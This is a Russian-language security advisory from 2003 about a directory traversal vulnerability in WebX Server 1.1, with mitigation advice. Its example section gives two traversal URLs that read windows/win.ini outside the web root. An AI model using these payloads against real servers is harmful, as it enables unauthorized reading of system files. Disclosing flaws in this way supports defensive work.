Доступ к произвольным файлам в WebX Server HTTP сервере

Дата публикации:
12.09.2003
Всего просмотров:
767
Опасность:
Критическая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:

Уязвимые версии: WebX и WebX Lite1.1

Описание: Уязвимость обнаружена в WebX Server HTTP сервере. Удаленный пользователь может просматривать файлы на системе, расположенные вне wwwroot каталога.

Пример/Эксплоит:

http://[target]/../../../../../. ./../../../../windows/win.ini
http://[target]/.../.../.../.../.../.../.../windows/win.ini

URL производителя: http://www.futurewavetech.com/products/webx.html

Решение:

Способов устранения обнаруженной уязвимости не существует в настоящее время. Фильтруйте последовательность ‘/…/’ на http прокси. Используйте альтернативное программное обеспечение.

Ссылки: WebX 1.1 web server Advisory
или введите имя

CAPTCHA